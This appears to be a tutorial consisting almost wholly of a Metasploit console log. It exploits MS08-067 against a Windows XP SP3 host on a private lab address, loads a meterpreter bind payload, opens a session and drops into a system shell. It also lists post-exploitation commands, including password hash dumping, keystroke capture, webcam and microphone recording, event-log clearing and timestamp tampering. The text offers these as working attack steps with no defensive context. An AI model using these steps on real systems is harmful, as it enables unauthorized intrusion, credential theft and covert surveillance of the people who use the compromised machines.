HOW TO EXPLOIT WIN XP3 USING BACKTRACK 5
root@bt:~# msfconsole
Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018 es: 0018 ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
Stack: 90909090990909090990909090
90909090990909090990909090
90909090.90909090.90909090
90909090.90909090.90909090
90909090.90909090.09090900
90909090.90909090.09090900
..........................
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
ccccccccc.................
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
.................ccccccccc
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
..........................
ffffffffffffffffffffffffff
ffffffff..................
ffffffffffffffffffffffffff
ffffffff..................
ffffffff..................
ffffffff..................
Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 425 auxiliary - 128 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
=[ svn r14551 updated 14 days ago (2012.01.14)
Warning: This copy of the Metasploit Framework was last updated 14 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf > show exploits
Exploits
========
Name Disclosure Date Rank Description
---- --------------- ---- -----------
aix/rpc_cmsd_opcode21 2009-10-07 great AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
aix/rpc_ttdbserverd_realpath 2009-06-17 great ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
bsdi/softcart/mercantec_softcart 2004-08-19 great Mercantec SoftCart CGI windows/mssql/mssql_payload_sqli 2000-05-30 excellent Microsoft SQL Server Payload Execution via SQL injection
windows/mysql/mysql_payload 2009-01-16 excellent Oracle MySQL for Microsoft Windows Payload Execution
windows/mysql/mysql_yassl_hello 2008-01-04 average MySQL yaSSL SSL Hello Message Buffer Overflow
windows/nfs/xlink_nfsd 2006-11-06 average Omni-NFS Server Buffer Overflow
windows/nntp/ms05_030_nntp 2005-06-14 normal Microsoft Outlook Express NNTP Response Parsing Buffer Overflow
windows/novell/groupwisemessenger_client 2008-07-02 normal Novell GroupWise Messenger Client Buffer Overflow
windows/novell/nmap_stor 2006-12-23 average Novell NetMail <= 3.52d NMAP STOR Buffer Overflow
windows/novell/zenworks_desktop_agent 2005-05-19 good Novell ZENworks 6.5 Desktop/Server Management Overflow
windows/oracle/extjob 2007-01-01 excellent Oracle Job Scheduler Named Pipe Command Execution
windows/oracle/osb_ndmp_auth 2009-01-14 good Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow
windows/oracle/tns_arguments 2001-06-28 good Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow
windows/oracle/tns_auth_sesskey 2009-10-20 great Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow
windows/oracle/tns_service_name 2002-05-27 good Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow
windows/pop3/seattlelab_pass 2003-05-07 great Seattle Lab Mail 5.5 POP3 Buffer Overflow
windows/postgres/postgres_payload 2009-04-10 excellent PostgreSQL for Microsoft Windows Payload Execution
windows/proxy/bluecoat_winproxy_host 2005-01-05 great Blue Coat WinProxy Host Header Overflow
windows/proxy/ccproxy_telnet_ping 2004-11-11 average CCProxy <= v6.2 Telnet Proxy Ping Overflow
windows/proxy/proxypro_http_get 2004-02-23 great Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow
windows/proxy/qbik_wingate_wwwproxy 2006-06-07 good Qbik WinGate WWW Proxy Server URL Processing Overflow
windows/scada/citect_scada_odbc 2008-06-11 normal CitectSCADA/CitectFacilities ODBC Buffer Overflow
windows/scada/codesys_web_server 2011-12-02 normal SCADA 3S CoDeSys CmpWebServer <= v3.4 SP4 Patch 2 Stack Buffer Overflow
windows/scada/daq_factory_bof 2011-09-13 good DaqFactory HMI NETB Request Overflow
windows/scada/factorylink_csservice 2011-03-25 normal Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow
windows/scada/factorylink_vrn_09 2011-03-21 average Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow
windows/scada/iconics_genbroker 2011-03-21 good Iconics GENESIS32 Integer overflow version 9.21.201.01
windows/scada/iconics_webhmi_setactivexguid 2011-05-05 good ICONICS WebHMI ActiveX Buffer Overflow
windows/scada/igss9_igssdataserver_listall 2011-03-24 good 7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Buffer Overflow
windows/scada/igss9_igssdataserver_rename 2011-03-24 normal 7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow
windows/scada/igss9_misc 2011-03-24 excellent 7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities
windows/scada/moxa_mdmtool 2010-10-20 great MOXA Device Manager Tool 2.1 Buffer Overflow
windows/scada/procyon_core_server 2011-09-08 normal Procyon Core Server HMI <= v1.13 Coreservice.exe Stack Buffer Overflow
windows/scada/realwin 2008-09-26 great DATAC RealWin SCADA Server Buffer Overflow
windows/scada/realwin_on_fc_binfile_a 2011-03-21 great DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow
windows/scada/realwin_on_fcs_login 2011-03-21 great RealWin SCADA Server DATAC Login Buffer Overflow
windows/scada/realwin_scpc_initialize 2010-10-15 great DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow
windows/scada/realwin_scpc_initialize_rf 2010-10-15 great DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow
windows/scada/realwin_scpc_txtevent 2010-11-18 great DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow
windows/scada/scadapro_cmdexe 2011-09-16 excellent Measuresoft ScadaPro <= 4.0.0 Remote Command Execution
windows/scada/winlog_runtime 2011-01-13 great Sielco Sistemi Winlog Buffer Overflow
windows/sip/aim_triton_cseq 2006-07-10 great AIM Triton 1.0.4 CSeq Buffer Overflow
windows/sip/sipxezphone_cseq 2006-07-10 great SIPfoundry sipXezPhone 0.35a CSeq Field Overflow
windows/sip/sipxphone_cseq 2006-07-10 great SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow
windows/smb/ms03_049_netapi 2003-11-11 good Microsoft Workstation Service NetAddAlternateComputerName Overflow
windows/smb/ms04_007_killbill 2004-02-10 low Microsoft ASN.1 Library Bitstring Heap Overflow
windows/smb/ms04_011_lsass 2004-04-13 good Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
windows/smb/ms04_031_netdde 2004-10-12 good Microsoft NetDDE Service Overflow
windows/smb/ms05_039_pnp 2005-08-09 good Microsoft Plug and Play Service Overflow
windows/smb/ms06_025_rasmans_reg 2006-06-13 good Microsoft RRAS Service RASMAN Registry Overflow
windows/smb/ms06_025_rras 2006-06-13 average Microsoft RRAS Service Overflow
windows/smb/ms06_040_netapi 2006-08-08 good Microsoft Server Service NetpwPathCanonicalize Overflow
windows/smb/ms06_066_nwapi 2006-11-14 good Microsoft Services MS06-066 nwapi32.dll
windows/smb/ms06_066_nwwks 2006-11-14 good Microsoft Services MS06-066 nwwks.dll
windows/smb/ms06_070_wkssvc 2006-11-14 manual Microsoft Workstation Service NetpManageIPCConnect Overflow
windows/smb/ms07_029_msdns_zonename 2007-04-12 manual Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative Path Stack Corruption
windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07 good Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
windows/smb/ms10_061_spoolss 2010-09-14 excellent Microsoft Print Spooler Service Impersonation Vulnerability
windows/smb/netidentity_xtierrpcpipe 2009-04-06 great Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow
windows/smb/psexec 1999-01-01 manual Microsoft Windows Authenticated User Code Execution
windows/smb/smb_relay 2001-03-31 excellent Microsoft Windows SMB Relay Code Execution
windows/smb/timbuktu_plughntcommand_bof 2009-06-25 great Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow
windows/smtp/mailcarrier_smtp_ehlo 2004-10-26 good TABS MailCarrier v2.51 SMTP EHLO Overflow
windows/smtp/mercury_cram_md5 2007-08-18 great Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
windows/smtp/ms03_046_exchange2000_xexch50 2003-10-15 good MS03-046 Exchange 2000 XEXCH50 Heap Overflow
windows/smtp/njstar_smtp_bof 2011-10-31 normal NJStar Communicator 3.00 MiniSMTP Server Remote Exploit
windows/smtp/wmailserver 2005-07-11 average SoftiaCom WMailserver 1.0 Buffer Overflow
windows/smtp/ypops_overflow1 2004-09-27 average YPOPS 0.6 Buffer Overflow
windows/ssh/freeftpd_key_exchange 2006-05-12 average FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow
windows/ssh/freesshd_key_exchange 2006-05-12 average FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
windows/ssh/putty_msg_debug 2002-12-16 normal PuTTy.exe <= v0.53 Buffer Overflow
windows/ssh/securecrt_ssh1 2002-07-23 average SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow
windows/ssl/ms04_011_pct 2004-04-13 average Microsoft Private Communications Transport Overflow
windows/telnet/gamsoft_telsrv_username 2000-07-17 average GAMSoft TelSrv 1.5 Username Buffer Overflow
windows/telnet/goodtech_telnet 2005-03-15 average GoodTech Telnet Server <= 5.0.6 Buffer Overflow
windows/tftp/attftp_long_filename 2006-11-27 average Allied Telesyn TFTP Server 1.9 Long Filename Overflow
windows/tftp/dlink_long_filename 2007-03-12 good D-Link TFTP 1.0 Long Filename Buffer Overflow
windows/tftp/futuresoft_transfermode 2005-05-31 average FutureSoft TFTP Server 2000 Transfer-Mode Overflow
windows/tftp/opentftp_error_code 2008-07-05 average OpenTFTP SP 1.4 Error Packet Overflow
windows/tftp/quick_tftp_pro_mode 2008-03-27 good Quick FTP Pro 2.1 Transfer-Mode Overflow
windows/tftp/tftpd32_long_filename 2002-11-19 average TFTPD32 <= 2.21 Long Filename Buffer Overflow
windows/tftp/tftpdwin_long_filename 2006-09-21 great TFTPDWIN v0.4.2 Long Filename Buffer Overflow
windows/tftp/threectftpsvc_long_mode 2006-11-27 great 3CTftpSvc TFTP Long Mode Buffer Overflow
windows/unicenter/cam_log_security 2005-08-22 great CA CAM log_security() Stack Buffer Overflow (Win32)
windows/vnc/realvnc_client 2001-01-29 normal RealVNC 3.3.7 Client Buffer Overflow
windows/vnc/ultravnc_client 2006-04-04 normal UltraVNC 1.0.1 Client Buffer Overflow
windows/vnc/winvnc_http_get 2001-01-29 average WinVNC Web Server <= v3.3.3r7 GET Overflow
windows/vpn/safenet_ike_11 2009-06-01 average SafeNet SoftRemote IKE Service Buffer Overflow
windows/wins/ms04_045_wins 2004-12-14 great Microsoft WINS Service Memory Overwrite
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.56.101 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal Generic x86 Tight Loop
windows/adduser normal Windows Execute net user /ADD
windows/dllinject/bind_ipv6_tcp normal Reflective Dll Injection, Bind TCP Stager (IPv6)
windows/dllinject/bind_nonx_tcp normal Reflective Dll Injection, Bind TCP Stager (No NX or Win7)
windows/dllinject/bind_tcp normal Reflective Dll Injection, Bind TCP Stager
windows/dllinject/reverse_http normal Reflective Dll Injection, Reverse HTTP Stager
windows/dllinject/reverse_ipv6_http normal Reflective Dll Injection, Reverse HTTP Stager (IPv6)
windows/dllinject/reverse_ipv6_tcp normal Reflective Dll Injection, Reverse TCP Stager (IPv6)
windows/dllinject/reverse_nonx_tcp normal Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
windows/dllinject/reverse_ord_tcp normal Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
windows/dllinject/reverse_tcp normal Reflective Dll Injection, Reverse TCP Stager
windows/dllinject/reverse_tcp_allports normal Reflective Dll Injection, Reverse All-Port TCP Stager
windows/dllinject/reverse_tcp_dns normal Reflective Dll Injection, Reverse TCP Stager (DNS)
windows/download_exec normal Windows Executable Download and Execute
windows/exec normal Windows Execute Command
windows/loadlibrary normal Windows LoadLibrary Path
windows/messagebox normal Windows MessageBox
windows/meterpreter/bind_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
windows/meterpreter/bind_nonx_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/meterpreter/bind_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager
windows/meterpreter/reverse_http normal Windows Meterpreter (Reflective Injection), Reverse HTTP Stager
windows/meterpreter/reverse_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
windows/meterpreter/reverse_ipv6_http normal Windows Meterpreter (Reflective Injection), Reverse HTTP Stager (IPv6)
windows/meterpreter/reverse_ipv6_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager (IPv6)
windows/meterpreter/reverse_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_nonx_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
windows/metsvc_bind_tcp normal Windows Meterpreter Service, Bind TCP
windows/metsvc_reverse_tcp normal Windows Meterpreter Service, Reverse TCP Inline
windows/patchupdllinject/bind_ipv6_tcp normal Windows Inject DLL, Bind TCP Stager (IPv6)
windows/patchupdllinject/bind_nonx_tcp normal Windows Inject DLL, Bind TCP Stager (No NX or Win7)
windows/patchupdllinject/bind_tcp normal Windows Inject DLL, Bind TCP Stager
windows/patchupdllinject/reverse_ipv6_tcp normal Windows Inject DLL, Reverse TCP Stager (IPv6)
windows/patchupdllinject/reverse_nonx_tcp normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_ord_tcp normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_tcp normal Windows Inject DLL, Reverse TCP Stager
windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager
windows/patchupdllinject/reverse_tcp_dns normal Windows Inject DLL, Reverse TCP Stager (DNS)
windows/patchupmeterpreter/bind_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)
windows/patchupmeterpreter/bind_nonx_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)
windows/patchupmeterpreter/bind_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager
windows/patchupmeterpreter/reverse_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)
windows/patchupmeterpreter/reverse_nonx_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_ord_tcp normal Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager
windows/patchupmeterpreter/reverse_tcp_dns normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)
windows/shell/bind_ipv6_tcp normal Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp normal Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp normal Windows Command Shell, Bind TCP Stager
windows/shell/reverse_http normal Windows Command Shell, Reverse HTTP Stager
windows/shell/reverse_ipv6_http normal Windows Command Shell, Reverse HTTP Stager (IPv6)
windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager
windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse TCP Stager (DNS)
windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline
windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline
windows/speak_pwned normal Windows Speech API - Say "You Got Pwned!"
windows/upexec/bind_ipv6_tcp normal Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp normal Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp normal Windows Upload/Execute, Bind TCP Stager
windows/upexec/reverse_http normal Windows Upload/Execute, Reverse HTTP Stager
windows/upexec/reverse_ipv6_http normal Windows Upload/Execute, Reverse HTTP Stager (IPv6)
windows/upexec/reverse_ipv6_tcp normal Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp normal Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp normal Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp normal Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager
windows/upexec/reverse_tcp_dns normal Windows Upload/Execute, Reverse TCP Stager (DNS)
windows/vncinject/bind_ipv6_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp normal VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/reverse_http normal VNC Server (Reflective Injection), Reverse HTTP Stager
windows/vncinject/reverse_ipv6_http normal VNC Server (Reflective Injection), Reverse HTTP Stager (IPv6)
windows/vncinject/reverse_ipv6_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager
windows/vncinject/reverse_tcp_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > check
[*] Verifying vulnerable status... (path: 0x0000005a)
[+] The target is vulnerable.
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:39401 -> 192.168.56.101:4444) at 2012-01-28 11:06:22 +0700
meterpreter > ?
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
del Delete the specified file
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
meterpreter > sysinfo
Computer : VICTIM-141A1470
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter > shell
Process 424 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
